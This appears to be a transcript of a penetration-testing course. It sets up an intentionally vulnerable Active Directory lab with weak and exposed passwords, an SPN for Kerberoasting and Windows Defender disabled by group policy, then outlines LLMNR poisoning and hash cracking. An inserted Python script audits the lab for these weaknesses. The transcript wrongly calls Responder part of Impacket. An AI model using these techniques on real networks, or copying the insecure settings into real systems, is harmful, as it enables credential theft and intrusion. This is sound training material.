Install Now, and it's going to start bringing up this setup. So, for the magic of video, I'm going to pause in between on these recordings, and then I'm going to let them finish, and then we're going to go ahead and move on to the next one. So from here let's go ahead and select Windows Server 2019 Standard Evaluation (Desktop Experience), and we're going to select Next, and then once it starts installing I'll go ahead and pause. I accept the license terms, hit Next. We're going to select Custom install down here, and we have Drive 0 unallocated space; go ahead and select New, and then we're going to hit Apply and say OK, and you're going to see that it creates a bunch of different partitions for us. And really we only have a little bit here that we need for actually installing, and then the rest is going to be free space when we need it. So let's go ahead and hit Next, and now this is going to take a little bit of time to install, so go ahead and let yours install and then meet me back when you're ready for the rest of the steps.

Okay, your computer should have restarted and brought you to a screen that looks like this, where it says Customize Settings. So here we have an Administrator user, and we're going to need to enter a password in. So I'm going to be entering in a password of "password," but it's going to be a capital P, and then it's going to be the at symbol, two dollar signs, a lowercase w, a zero, r, d, exclamation. Let me show you what that looks like in a Notepad; it looks just like that: P@$$w0rd! You can put any password you want here, but this is what I'm going to be using for this course. So I'm going to go ahead and type that in one more time and go ahead and hit Finish, and now it's finalizing our settings. We have this Ctrl+Alt+Delete to unlock, so to do that go ahead and just come up here, Send Ctrl+Alt+Del, and then log in with your new password, and now it's going to load up your profile, and this may take just a second to get ready. Okay, so from here we're going to click this full
screen; you're going to see that we're not full-screening, so we're going to have an issue with full screen. What we're going to need to do is to install our tools here. So we have tools that we can install: if we go to Manage and say Install VMware Tools, click on that and select Install. This is going to allow us to actually have a full screen on this machine. So now it has popped up and said "DVD Drive VMware Tools, select what happens"; let's go ahead and just click on it and say Run setup64.exe. This is going to run the installation, and then we're going to need to reboot afterwards. So from here hit Next, we'll do a Complete install, Next, and Install. Okay, and you can see that it's already made it full screen for you, and it says you can restart your system; we'll just go ahead and say No, we plan to manually restart. There's a few more things I want to take care of, or at least one. So let's go to the Start menu and we're going to type in "computer," and it says View Your PC Name right here; go ahead and select View Your PC Name, and we select Rename This PC right here. And now name this what you want to name your PC. So this is the domain controller; I'm going to name it something that is significant, that you know resembles a domain controller. So for this I'm just going to name this HYDRA-DC. Now my theme is going to be a Marvel theme; I kind of like Marvel Comics type stuff, so I'm going to make this a Marvel-themed domain controller. You can make this whatever you want, so you can just make this "my domain controller" if you want, but I'm just putting in here HYDRA-DC, and then I'm going to say Next, and it's going to prompt you to restart your computer now or restart it later. Go ahead and hit Restart Now, and we'll just say Other (Unplanned) is fine; hit Continue; let this restart. Okay, so you should be taken to a login screen now, so go ahead and hit Ctrl+Alt+Delete again, go ahead and put in your password up here, and you should sign in. Now every time that you log on to a server like this, you're
going to get the Server Manager that pops up, and we're going to go ahead and work on installing a domain controller here. So what we're going to do is we're going to go up to Manage and we're going to say Add Roles and Features up here, and we're going to go ahead and just click Next here, Role-based or feature-based installation, we're going to select Next again, and then the server role that we want to add, we're going to go ahead and say Active Directory Domain Services right here. So remember AD DS; you saw that a bunch of times; this is exactly what it is. Go ahead and say Add Features, select Next, select Next, and then we're going to say Install, and go ahead and let this install. Once this is completely installed, go ahead and unpause your video and meet me back here and we'll focus on the rest.

All right, now your feature installation should be complete; go ahead and hit Close. You can see we've got this little alert up here; let's go ahead and click on this flag, and you see it says "Promote this server to a domain controller." So we haven't done that yet; let's go ahead and do that. And now it's going to ask us for some information. So it's going to say how do we want to deploy this, and we're going to say let's go ahead and just add a new forest. And what do we want to call this root domain name? So I'm going to call this marvel.local. So go ahead and give it something to that effect; whatever you're going to call your domain, give it that and then a .local. So we're just saying .local instead of .com or .org, whatever you want your domain name to be. So for me, again, marvel.local. Go ahead and select Next, and this might just take a minute. Okay, from here we're going to go ahead and give this a password, whatever password we want, for this Directory Services Restore Mode; you can make it the same thing, like the password. I'm just going to do that, okay, and then go ahead and hit Next, and we're going to select Next for this. This will take a second, and then once it loads it should populate your
marvel.local name here, okay; go ahead and select Next. Okay, now you're brought to this Paths screen, and remember again the NTDS comes up here, and it says hey, where do you want to put your database, log files, etc. Remember we saw the NTDS in the beginning; just remember this again here. You've got your database folder, your log folder, and then we'll talk about what the SYSVOL is a little bit later. Let's go ahead and hit Next; we'll hit Next here again, and this section may take another second or two to load; go ahead and pause if you need to. Okay, now you will be brought to this screen that says Install. Once you click Install, it's going to go ahead and install everything, and then it's going to automatically reboot the machine when it's done, so be prepared for that. So go ahead and hit Install and let your machine reboot if needed. So now your machine should have rebooted, and we can come in here and say Ctrl+Alt+Delete one more time. Now you see it says MARVEL\Administrator; before it just said Administrator, now it says MARVEL\Administrator. That means we're logging into a domain of Marvel as the Administrator. So now the password that you've been using should still work; go ahead and put that in, log in, and now you're logged in as the Marvel administrator of this domain. There's a lot of fun stuff we could start doing with this, but we're going to hold off until we actually get the other two machines set up that we need. So in the next video we're going to work on setting up those machines, and then we're going to tie it all together and start building out our lab and all of our features that we need to actually start attacking it. So I will catch you over in the next video.

All right, now we have a domain controller; we've got to have a couple of user machines. So we're going to be setting up the same machine twice; we're going to walk through one setup, and then I'm going to have you do this all over again and set it up a second time. So we're going to need two machines for a
couple of the different attacks that we're going to pull off in this lab. However, if you're running low on space and you just want to utilize one machine, or you're running low on RAM, that's perfectly acceptable; you can just pay attention to the two-machine attacks and just kind of take notes on those and know about them, but you don't have to necessarily pull them off unless you want to. So let's go ahead and do the same steps over. We're going to go ahead and say Create a New Virtual Machine, very similar to the last time, and we're going to say Browse, and I'm just going to select this client Enterprise here, the other ISO that we downloaded. It says Windows 10 x64 detected; good job. Go ahead and select Next, and then again with this you can just go ahead and say Windows 10 product key; we're going to do Pro on this, or Enterprise, actually, Windows 10 Enterprise, and the rest can stay blank, and say Next. And yes, same thing here as before: select your location if you need a different one; I'm going to roll with the default and select Next again. 60 gigs, split it up; it won't take up that much space. Go ahead and select Next, and same as before, do not power on this machine; let's go ahead and hit Finish. This is going to create it, and then we're going to go in there, we're going to edit and remove that floppy just like we did before; that way we don't have any kind of weird boot issues. Now the Windows 10 is going to take a little bit longer to install than the actual domain controller, or the server, did. So let's go ahead now and select Edit Virtual Machine Settings down here, remove this floppy drive like before, leave your connection as NAT just like we did before, and two gigs of memory should be fine. Go ahead and hit OK, and then we're going to go ahead and play this virtual machine. Same thing as before: get your trigger fingers ready, press any key, and there you go; it should start booting up into our Windows menu, and this will just take a second for it to load up. Okay, so we're brought to this screen;
let's go ahead and just select Next with all defaults, and then Install Now. This should just take a few seconds; again, if you need to pause and continue, that's absolutely fine. Let's go ahead and say I accept the terms, Next, Custom install just like before, and we're going to say New just like before, Apply, OK, and it'll set up just like it did previously. Hit Next, and then just like before here, let's go ahead and let this do its install thing. Go ahead, hit pause, and then come back once you're completely installed with all of your features; this will take just a little bit.

All right, once everything has installed, you should be brought to this region screen. Let's go ahead and just select Next; I'm in the United States, I'm going to say yes on the United States, and it's going to say "just a moment," and which keyboard layout do you want? Go ahead and select your keyboard layout; mine's US-based. Do you want to add a second keyboard? I'm going to say Skip, and now it's going to do more setups, so go ahead and pause the video and come back when these setups are complete. Now you're brought to the screen to sign in with a Microsoft account. You don't have to do that; go ahead and select Domain join instead, down here, and then it says who's going to be using this PC. Let's go ahead and just give it a name, so for this one I'm going to say Frank Castle; so we'll do something like that and hit Next. And what's Frank's password going to be? My password is going to be Password1, with a capital P. Terrible password, but Frank, he doesn't use the best passwords. And again, let's go ahead and just say Password1, Next. And it's going to ask for security questions, so go ahead: what's your pet's name? I'm just going to say Bob, and we'll go ahead and have different ones in here. What city were you born in? Bob. And security question three, childhood nickname: you guessed it, it's Bob. Go ahead and hit Next, and then do you want to access more devices? Say No, Decline, and then in here I like to turn everything off, so
turn all this stuff off, and then let's go ahead and just hit Accept. And now you're going to get this wonderful screen, which you may have seen before; it's going to say "we're getting everything ready for you." So go ahead and pause one more time, and then come back once your screen's all ready to go. Okay, now your screen should load to something similar to this. Again we've got this funky small screen, so let's go up to Player, Manage, and Install VMware Tools, and it's going to be the same process as before. We should get a little pop-up here in the corner in just a second; we're going to install that, and it should bring things to full screen. Go ahead and click on this, run this setup, and select Yes, and what we're going to do is we're going to install this, get this full screen, and once we've got this on Complete here, Next, Install. I'm going to let this run through, and I'm going to talk about kind of what the next steps are, and then we're going to repeat all this process one more time; I'm actually going to have you do it on your own. So from here, what we're going to do is we're going to let this install, we're going to do a name change of the computer, and then we're going to reboot. After that, what we're going to do is we're going to hit the pause button, get our second machine installed, set up our Active Directory in another video, and then come back and join both of these machines to the domain, and then we should be good to start attacking them. So let's go ahead and hit Finish, and then what I'm going to do is I'm going to say No again here. Let's see if it actually made it full screen; it did. And then we're going to come here, and we're just going to go in and we're going to say "computer name," just as before, View Your PC Name, and scroll down, Rename This PC. So for me, I am a Marvel fan, and this computer belongs to Frank Castle, who is the Punisher, so I'm going to name this THEPUNISHER, something like that; you can name it whatever you want. I'm going to go ahead and hit Next, and then this should say okay,
good to go, and then it's going to ask us to reboot. We'll reboot, have the new machine name, and should be good to go. So let your machine reboot with your new name, then go ahead and repeat this process all over again: have a second machine running, pick whatever machine name you want for it, and get both of those machines to the same state. From here we're going to go ahead and set up our settings, then we'll join all of our machines to the domain and be ready to attack. So I will see you in the next video.

Okay, now let's configure our domain controller, and we're going to configure some policies, create some users, and just take a general look at Active Directory. So on your domain controller, go ahead and log in. Remember here that this is the funky password that we set up, with the capital P, at, dollar, dollar, lowercase w, zero, r, d, exclamation (P@$$w0rd!); this should be your Administrator password. So from here we are brought again to this Server Manager dashboard. Now let's go ahead and click on Tools up here, and we're going to select Active Directory Users and Computers. So go ahead and select that, and if we click into this marvel.local here, you can see we have a few different OUs; these are organizational units. Now we've got Builtin; we've got a bunch of built-in security groups here. We have Computers: if any computers are joined to the domain, they will show up here. We've got our Domain Controllers, which is HYDRA-DC, and we've got other things here: we've got Managed Service Accounts, which we don't have any of; Foreign Security Principals, don't have any of those; and then Users. So we've got security groups in here. I like to just create a new group, and we can just, like, right-click in here and say New, and then say Group, or Organizational Unit, actually, and then we can just say "Groups," something like this, say OK. And then I like to take all these groups out of the Users container and kind of just drag them over and say yes, that's fine, copy these, drag these over, say yes, that's fine, and now we've got it nice and
cleaned out for our Users area. Now note this little down arrow next to Guest: if you see a down arrow on an account, that means that the account has been disabled. So from here we have our Administrator user; we could double-click on that, we can provide all kinds of little properties, descriptions, etc.; we can pick what groups this person is a member of. So you can see that the Administrator is a member of Domain Admins, which means that they are an administrator; Enterprise Admins as well, Schema Admins, and Domain Users. So if you're a domain user, that means you are able to log into the domain. So we're going to create a couple of domain users, and we'll create another domain admin as well, or two, and just give an idea of what these accounts are going to look like. So first let's go ahead and just right-click, and we're going to say New, and then we're going to say User, and I'm going to go ahead first and create Frank Castle. So I'm just going to say Frank Castle, and then you're going to want to pick your naming convention here, so I'm just going to say fcastle, like this, first initial, last name. Go ahead and hit Next, and then here you're going to pick a password. I'm going to give him Password1 again, just like I did before, and then I'm going to say the password never expires. This is bad. I'm not going to have them change it at the next logon; I'm not going to say the user can change the password; it should just be like that. Finish, and there you go. Okay, so let's create another user. I'm going to right-click on Administrator and I'm just going to say Copy, and here I'm copying a domain admin, and so what's going to happen? Let's create another user; we'll say Tony Stark. Tony Stark is going to be our domain admin; we'll say tstark; hit Enter for Next, and we can give him a more complex password if you want. So I'm going to give him something like Password2019!@# (password, 2019, exclamation, at symbol, pound sign). It's not great by any means, but it's a little bit better. And then we'll just say password never expires, Next, Finish.
Okay, let's create two more users. So let's create this user here: we're going to right-click on Frank Castle, we'll say Copy, and on this one we're going to give, we'll say Spider-Man, we'll say Peter Parker, and pparker here. Okay, and then we can have a different password for Peter; we can just say something like Password2 and then Password2 again. Okay, password never expires, good, Next, Finish. And just to show you what's going on, let's click into Peter Parker: you can see Peter Parker's just a member of Domain Users, because we copied that property from Frank Castle. Now if we look at Tony Stark, you can see that Tony Stark is a member of all the same groups as this Administrator, because we copied that from the Administrator. So Tony Stark is a domain administrator, which is exactly what we want right now. So we're going to create one more user. Let's go ahead and create a fake SQL account, so we're going to right-click and we're going to copy Tony Stark, and we're going to do a no-no: we're going to make this SQL service account a domain administrator. Now, your service accounts should not be domain administrator accounts, but I would say probably seventy percent of the time that I'm doing a pen test, the service accounts are domain administrators, and I'll show you here in just a few videos why it's bad and what we can do to attack those service accounts that are domain administrators. So from here let's just call the SQL service something like this; we'll just call this SQLService, just like that. Okay, and we'll hit Next, and then on this we're going to give it a password. I'm going to give it a password of something like MYpassword123#. Actually, I'm messing this up, so I'm going to give you the syntax: capital M, capital Y, lowercase password, one two three, pound: MYpassword123#. Go ahead, hit Next and Finish that. So if you needed that one more time, I'll open up a notepad, and that is MYpassword123#.

All right, now I'm going to open up the SQLService user, and in the description let's say that I forgot the password, or I'm just going to say "password is" and then we'll just say something like MYpassword123#. Now you'll see why this is bad later on, but a lot of domain administrators like to put passwords of their service accounts in the description because they think that they are the only ones that can read them. Not true; we'll see how we can read this later on, but for now we'll just say password is MYpassword123#, and we've got a few users in here and we've kind of got this set up, so this is good to go. Let's go ahead and do a couple more things. So let's go ahead and set up a file share. Click on this down here, and if I clicked on that too fast, it's File and Storage Services under Server Manager, and then we're going to click on Shares right here, and then there's a Tasks up here at the top; go ahead and just say New Share, and we'll just select SMB Share - Quick. The share location is HYDRA-DC, that's fine, C drive, and we'll just say the share name is going to be hackme, something like that. Okay, hit Next, we're just going to use all defaults, Create and Close. So now we have this C:\Shares\hackme share. Why did I just do that? Because most domain controllers have file shares, and we've talked about this before, but we wanted to open up 139 and 445 so that we have SMB enabled on this domain controller. So if we were to scan against it we would see that there is 139 and 445, and we can leverage some attacks against this, and we're going to enable that on our machines as well, when we're searching or having file shares on our personal user computers as well. So for now this is good, and we're going to do a couple more things. So let's go ahead and open up a command prompt: go ahead and just type in "command" and run that as an administrator, and we're going to create what is called an SPN, a service principal name. Don't worry too much about what we're doing right now; we're going to talk about this way more when it comes time, and we're going to talk about the attack related to this. We're setting up an attack for Kerberoasting, and that is an attack that attacks services. Okay, so we set up the SQL service, we're going to attack the SQL service, but we have to set up a service principal name, which we'll cover a bit later on in the course. So first let's go ahead and get that set up. So we're going to say setspn and then we're going to do a -a, and we're going to say HYDRA-DC, or whatever you named your domain controller, and then we're going to say SQLService (whatever you named your SQL server; it should be the same as mine) .marvel.local, like this, and then we'll pick a port; I'm picking 60111, and then we're going to say MARVEL, like this, and then we'll say SQLService. So again: setspn -a HYDRA-DC/SQLService.marvel.local:60111 MARVEL\SQLService, where HYDRA-DC is the computer name. Hit Enter, and then it's going to say checking it, registering it, and updated that object. Perfect. Now let's make sure that it is set, so we're going to say setspn -T marvel.local -Q */*, hit Enter, and down at the bottom you can see that the SQLService has been set: HYDRA-DC/SQLService.marvel.local:60111. Perfect. Okay, so now we have set up our users, we have set up our Kerberoasting attack, we have set up our SMB shares; there's one last thing we need to do. Let's close that, let's come into here and let's start typing in Group Policy, so we've got Group Policy Management here; right-click and run as administrator, and you can see that we've got the forest here of marvel.local. Go ahead and drill down into Domains and you see marvel.local here. I'm going to go ahead and right-click and say Create a GPO in this domain, and Link it here, and this GPO is going to be called Disable Windows Defender. All right, now hit Enter, and I realize that some of you are going to be wondering why we're disabling Windows Defender, so let's talk about this. There are many courses out there that show you antivirus evasion and bypassing, and I think it's great, and it is important to know those topics. The reason why we're not going into that in this course is because it changes so significantly, so quickly. A lot of these attacks are still going to work regardless of the antivirus that you have; most of these attacks are going to work. So what is important is to know the fundamentals of the attacks. If I show you AV evasion today, within two to three months it's going to be obsolete, and I hate to have that in a course and then have people get upset or frustrated that it's getting detected, because it's always changing. So I'd rather show you the foundations and the fundamentals and then let you learn the AV bypassing as the techniques come up, as the time changes. Remember, being a good penetration tester is about sticking with the times and staying up to date; as long as you're staying up to date, you're going to be fine. Knowing the foundations and the basics is way more important at this stage than any AV evasion or crazy fun technique like that. So please bear with me: we're going to get through this, we're going to disable Defender, we're going to work on all these attacks, learn the basics, and then you can improve upon that from there. So go ahead and right-click on this Disable Windows Defender here and select Edit, and then we're going to navigate in this Computer Configuration right here. We're going to click on Computer Configuration, and we're going to go into Policies, and we're going to go into Administrative Templates, and we're going to select Windows Components down here, and then if you scroll all the way down there's going to be a Windows Defender; we've got Windows Defender Antivirus right here, and we're going to click on that, and then we're going to Turn off Windows Defender Antivirus. Double-click, and we're just going to select Enabled here. Okay, and then we are going to Apply and select OK. Now let's also go into Windows Defender Exploit Guard and see if there's any protections that we need there. There's not. Defender SmartScreen, no detections that we need either. So as of right now we are good: we've got Defender turned off, we have the policy enabled, so once we actually join our domain PCs to the domain we will have no Windows Defender enabled on them, which is perfect; that's how we want to attack this. So now let's go ahead and close this. Okay, let's pause the video real quick, because there's one more thing I need to tell you, and that is that if you see here where it says Enforced, it says No; we need to make sure that it says Yes. So go ahead and right-click and then click on Enforced, and then it should say Yes, and then you are now good to go, and we have successfully configured this part of our course. What we're going to do next is we're going to finish setting up our PCs, our user PCs; we're going to join them to the domain, and we're going to enable some file shares on those, and then we'll be ready to start attacking those. So I'm very, very excited; once this lab is built we're going to be ready to roll. So I'll see you over in the next video when we join our PCs to the domain.

All right, so I'm going to run a setup for one machine. I want you to do it for the one machine, and then I want you to go ahead and do your second machine the exact same way if you're running the two-machine configuration. So I'm on the Windows 10 Enterprise; this is Frank Castle's machine, the Punisher, and we're going to go ahead and join this to the domain. So before we do that I do want to go ahead and go to our PC: go to This PC, go to your C drive, and then go ahead and just right-click, New Folder, and we're just going to call this Share, and we're going to make a fake share here. Well, it's going to be a real share, but we're not going to really use it, and we're just going to right-click on it, we're going to select Properties, and then we're going to go to Sharing. We're going to say Share right here, and then we're going to share with Everyone, and then say yes, turn on network discovery and file sharing for all public networks, and Done. And now we are sharing on this machine, so we can go ahead and close that out. Now on top of this we're going to go ahead and join this to the domain. So let's go ahead and first go to our domain controller and let's grab our IP address. Let's open a command prompt here and we're just going to say ipconfig, and our IP address is 192.168.57.140. So, 57.140. I'm going to go ahead and switch back to this machine, and now let's right-click on this access down here, on the internet access, and say Open Network & Internet settings. Down here you should see Change adapter options; go ahead and select that, and then we have Ethernet0 right here. Go ahead and right-click this and select Properties, and then we're going to go ahead and double-click on this IPv4, and it should bring up a screen that looks like this. We're going to leave Obtain an IP address automatically; this is DHCP, that's absolutely okay. Here on the DNS we're going to do something like this: we're going to say 192., if I can type, 192.168.57.140.
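The domain-controller setup above deliberately introduces several things an auditor would flag: a service account copied from a domain admin, its password typed into the description field, passwords set to never expire, and an SPN registered to a privileged account. As an added example, not code from the course, here is a small Python audit over a constructed export of those user objects. The record layout (dicts keyed by LDAP attribute names, as you might build from Get-ADUser or an LDAP query), the finding codes and the remediation text are my own assumptions; the sample records are constructed to mirror the lab.

```python
"""Added example: audit exported AD user objects for the lab's deliberate weaknesses.
The record layout and finding codes are assumptions; SAMPLE_USERS is constructed."""
import re

# Groups whose members are effectively domain-wide administrators.
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}

# Matches "password is X", "pwd: X", "pass=X" and similar. Every authenticated
# domain user can read the description attribute, so a match is exposed domain-wide.
SECRET_PATTERN = re.compile(r"\b(?:password|passwd|pwd|pass)\b\s*(?:is|=|:)\s*\S+", re.IGNORECASE)

REMEDIATION = {
    "PRIVILEGED_SERVICE_ACCOUNT": "Remove from admin groups; run the service under a gMSA or a least-privilege account.",
    "SPN_ACCOUNT": "A ticket can be requested for any account with an SPN; give it a long random password or use a gMSA.",
    "CREDENTIAL_IN_DESCRIPTION": "Clear the description and rotate the password; the attribute is readable by all domain users.",
    "PASSWORD_NEVER_EXPIRES": "Clear the flag so the domain password policy applies to this account.",
}


def audit_user(user):
    """Return the finding codes that apply to one user record (possibly empty)."""
    findings = []
    groups = {g.lower() for g in user.get("memberOf", [])}
    privileged = groups & PRIVILEGED_GROUPS
    has_spn = bool(user.get("servicePrincipalName"))
    if has_spn and privileged:
        findings.append("PRIVILEGED_SERVICE_ACCOUNT")
    elif has_spn:
        findings.append("SPN_ACCOUNT")
    if SECRET_PATTERN.search(user.get("description") or ""):
        findings.append("CREDENTIAL_IN_DESCRIPTION")
    if user.get("passwordNeverExpires"):
        findings.append("PASSWORD_NEVER_EXPIRES")
    return findings


def audit_domain(users):
    """Map sAMAccountName -> finding codes, only for users with at least one finding."""
    report = {}
    for user in users:
        findings = audit_user(user)
        if findings:
            report[user["sAMAccountName"]] = findings
    return report


# Constructed records mirroring the lab: Frank, Tony, Peter and the SQL service account.
ADMIN_GROUPS = ["Domain Admins", "Enterprise Admins", "Schema Admins", "Domain Users"]
SAMPLE_USERS = [
    {"sAMAccountName": "administrator", "memberOf": ADMIN_GROUPS,
     "description": "Built-in account for administering the domain", "passwordNeverExpires": False},
    {"sAMAccountName": "fcastle", "memberOf": ["Domain Users"], "passwordNeverExpires": True},
    {"sAMAccountName": "tstark", "memberOf": ADMIN_GROUPS, "passwordNeverExpires": True},
    {"sAMAccountName": "pparker", "memberOf": ["Domain Users"], "passwordNeverExpires": True},
    {"sAMAccountName": "SQLService", "memberOf": ADMIN_GROUPS,
     "servicePrincipalName": ["HYDRA-DC/SQLService.marvel.local:60111"],
     "description": "Password is MYpassword123#", "passwordNeverExpires": True},
]

if __name__ == "__main__":
    for sam, codes in audit_domain(SAMPLE_USERS).items():
        for code in codes:
            print(f"{sam}: {code} -> {REMEDIATION[code]}")
```

The description check requires a "password is / = / :" style phrase rather than the bare word, so a description such as "rotate password quarterly" does not fire; in a real run you would feed it the attribute values from your directory query instead of the constructed list.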
So we want the IP address of the domain controller here, because we need to get DNS from that. Go ahead and say OK, and then we're going to go over here and we're going to type in "domain," and it should say Access work or school. Go ahead and select that, and we're going to say Connect, and then it's going to bring this up, Set up a work or school account; down here say Join this device to a local Active Directory domain, and now it's going to say domain name. What are we going to join? Well, we're joining marvel.local. Okay, now it's going to say who do you want to join as. Well, let's go ahead and just say administrator, and then we're going to go ahead and say our password, which we set way back in the beginning, and now we are good to go. We're going to skip this feature here, and then we need to restart, so let's go ahead and restart now. So this is going to reboot, and when it reboots you're going to need to log in as your user. So how I've set up this domain is this user is going to be Frank Castle, so fcastle is going to log into the Punisher; the other user you saw me create was Peter Parker, or pparker, and I am making a machine called Spider-Man. So we're going to be able to have Spider-Man and we're going to have the Punisher as two machines. So I'm going to go ahead and log into this now. Instead of being Frank Castle, this is a local account; we're going to go ahead and do fcastle, like this, and we're going to say Password1, which is what we used before. Log in here and it should log us in as this user. Now it might take a second to get everything ready, and there's going to be one other setting that we're going to do on this computer specifically, and then there's going to be one setting on the other machine that we're going to want to do as well. So I'm going to go ahead and hit the brakes here and we're going to let this finish, and once it finishes we're going to go ahead, actually here it is, so let's go ahead and make these setting changes real quick. Now you can see that we are actually logged in as fcastle; we've successfully done that, great. So let's go ahead now and let's sign out and let's sign in as the Administrator, because I do want to make a couple of changes here. So let's go ahead and say administrator, and let's go ahead and, we'll do, we've got to do MARVEL\administrator, like that, and we'll do the password as we set it. Log into this computer, and it might take a second again. What we're going to do is we're going to enable Frank Castle to be a local administrator on this machine, so we want to set that up, and then we're going to go ahead and navigate over to Spider-Man's machine and we're going to set Frank Castle to be a local administrator there. There is a special attack that we want to do, actually two special attacks we want to do, that involve the usage of local administrators on multiple machines. So let's go ahead and come into here, and we're going to go into, right-click, or actually we could do right-click and Computer Management, and this should bring up our settings for local administrators. Okay, and then we come to Local Users and Groups in here; we've got Groups, go ahead and double-click Administrators, and then we're going to go ahead and add a couple of users. So we're going to add, well, we'll just add fcastle on this, so Check Names, fcastle is good, and then we're going to Apply and say OK, and we're good here. So let's go ahead and stop here. Go ahead and get your other machine set up completely; you need to log in as the administrator on your other machine and meet me over there. We're going to set up Frank Castle and Peter Parker as administrators there as well. Okay, now on to Peter Parker's machine, same deal here. So if we go into Administrators, I've made Peter Parker an administrator of his own machine, and I've also made Frank Castle an administrator of Peter Parker's machine. So however you set this up, make sure that you have a user that is on domain admin, or an admin I should say, on two machines, local administrator on two machines, and you have a user who is an administrator on their machine, on both. So Frank's an administrator on his own machine, Peter's an administrator on his own machine, and then Frank has administrator access on both machines. All right, and also make sure you set up everything the same: this also has a share in it, has the share here, and we're domain-joined. Last thing I want to point out, so let's go over to Windows Server and I'm going to log back in, and then let's take a look at what our Active Directory looks like now. So we come into here and let's go ahead and go into our Users and Computers and let's look at our Computers here; we might have to refresh up top, and then you can see now Spider-Man and the Punisher have been joined to this domain. They showed up in our OU here, and we know that we have successfully joined the domain; everything is set up the way we want it to be. Now we can move on to the attacking phase, where we start attacking all these things. And notice we only made a few changes, right? We did turn off Windows Defender, but for the most part we've got normal default settings for pretty much everything. We added some file shares to just emulate a network, and we set up a service that's pretty common as well. So so far, besides turning off Defender, everything is pretty common across the board for how you would see an Active Directory network set up. So from here we're going to exploit these settings, these almost-default configurations, and really just own this network all over the place. So let's see how we can do that, and I'll catch you over in the attack vectors video.

We are finally here. This is my favorite section of the course, and now we're going to start actually attacking. We've got our lab built out and we're ready to roll. So this first section I'm calling the initial attack vectors, and what I mean by that is this is the way we're going to initially attempt to attack Active Directory. There are a lot of post-compromise attacks, which you're going to see a little bit later, that require having some sort of credential or some sort of lateral movement already occurring. So first we have to find a way into the network. When we start a penetration test, especially internal, we just have a machine; we have our machine and we drop it into the network. Typically you're remote, you just RDP into this machine, or maybe you're on site and you're working in front of this computer, but you're just dropped into a network. You are given no credentials; you're given nothing. Okay, and what we're going to do is we're going to go through how we can abuse features of Windows, features again, these are not misconfigurations, just features of Windows, and utilize those to get access to user accounts, credentials, and get access to machines as well. So it's going to be a really, really fun ride. Now when I first started getting into Active Directory pen testing, my very first pen test, I had no idea what was going on and I was just kind of thrown into it. They said, here you go, go figure it out. So I was on site and I had my laptop and Google, and that's it, right? And I found this wonderful article, and I'm going to show it to you as well, and this is kind of what started me out. Now it doesn't really have the how to do it, but it just kind of has the here's what I do, and this is the 2018 edition, so it's a little dated, but most of these attacks are still very, very common, and what we're going to be covering in a lot of these, we're going to be covering all these attacks first of all, and a lot of these are those initial attack vectors. So this is the Top Five Ways I Got Domain Admin on Your Internal Network Before Lunch. I'm going to post this link down below in the references, and so this gentleman, Adam, here, he talks about NetBIOS and LLMNR poisoning; this is going to be our first topic that we're going to cover. We come through here, relay attacks, that's going to be the second topic that we cover, and we keep going through; let's see what else he's got: MS17-010, that is EternalBlue, right, and we covered that in the mid-course capstone. You saw how easy it was in the mid-course capstone; this is truly that easy. It is literally just discover the host running the vulnerable SMB, right, and then you exploit it. Very, very simple, just like we did it before; you get that shell, pretty easy. You would not believe, it's been almost three years now, how often we still see MS17-010 in a network; it's all the time. Okay, and then we're going to cover Kerberoasting later on when we get into post-compromise attacks, and mitm6 we're actually going to be covering as well in this first part of the initial attack vectors. These are all very, very good ones; they still hold up to date very well. Some of these are starting to be defended against, and we'll talk about that as we go, but when it comes to having a good reference point and a good starting point to learn attacks, if you knew these five going into an interview you would have a leg up over just a general candidate. So that's what we're after here: the practicality of this course and being practical with our attacks, understanding the attacks and the defenses, and getting you ready for that pen test interview. So let's go ahead and move on from here; we're going to get into our first attack, which is going to be LLMNR poisoning, so I'll catch you in the next video.

Okay, let's talk about our first attack. So this is called LLMNR poisoning. Now, what is LLMNR? So LLMNR is what is known as Link-Local Multicast Name Resolution, and when you say that, all we have to do to think about it is it's basically DNS. So it's used to identify hosts when DNS fails to do so, and this was previously known as NBT-NS, which was NetBIOS Name Service, and the key flaw here is that when we respond to this service, it actually responds back to us with a username and a password hash, and it's really bad. Okay, so we're going to take a quick overview and look at what it looks like; we're going to see how the attack is run
and talk through some of the strategies and then we're going to go ahead and actually do a live demo in the next video so you can follow along so let's take a look first at an overview so let's say we have a victim up here in the corner you see the victim machine and it reaches out to the server and it says Hey I want to connect to this hackm server well really the server name was hack me but the user just happened to type in something wrong which is causing a DNS issue and that DNS issue goes out we can't resolve with DNS and the server says hey I have no idea really what you're talking about here and so we go out and we say hey broadcast message I'm going to send this out to everybody does anybody know what this hack m is or where I can go to connect to it and US listening in the middle this is a man in the middle attack we're gonna say hey I know exactly where that computer is we're lying and we're going to say just send me over your hash and I'm going to get you connected and the victim's just going to say here you go here's my hash so that's really what lmnr poisoning is we're sitting in the middle listening for these requests and when the request happens we're just waiting to get a response to us so we're going to run a tool called responder and we'll talk about that here in a second so responder is part of the impacket toolkit now we ran impact it with several things in this course already we installed it way earlier and we even used it in some of the Box walkthroughs when we use the SMB client and the PS exec and the wmi exec that's all part of impact it and we're going to be using impact it for some other attacks as well as we go through some of these common active directory attacks so we're going to run a tool called responder it does exactly what we just described it responds to these requests and we just run this tool and we load it up and we're just sitting there and we're listening now my strategy is that I run this tool first thing in the morning so 
if my assessment starts at eight o'clock I'm running this first thing the best time to run this is first thing in the morning or right after lunch because people are coming back from lunch and you need a lot of traffic so I will actually start this up before I start up any nmap scans any Nessa scans anything at all this is one of the first things that goes up why do I do that because the nmap scan or the NASA scan is going to generate some traffic as well and then it might actually get some traffic talking back to you from other machines so we're just waiting for those responses and trying to capture hashes so let's say here that we run responder and then with running responder an event occurs now here all I'm doing is I am pointing this at our attacker machine IP address you don't have to worry about that too much but just think of this as somebody typed in the wrong network drive and this is just one example by the way a wrong network drive is just something failing to do DNS right so we're trying to access this network drive can access we're just sitting here listening in the middle for the ease of the demo we're going to point this out ourselves but that does not always have to be true once that happens an event occurs okay the event occurs and it says listening for events Look what comes through we get here a ntlmv to Hash right here and we get the IP address of who we captured and the user who we captured so you see here Marvel slash F Castle this is our Frank Castle user and this is their password hash now there's a lot of things that we can do with this hash and we're going to run a couple different attacks with it but the first attack we're going to talk about is just taking this hash and trying to crack it so we're going to take this hash and we're going to run it through a tool called hashcat and you can see here that we actually crack the password to be password one which is what we said it when we first set up the lab so that's really it all we're 
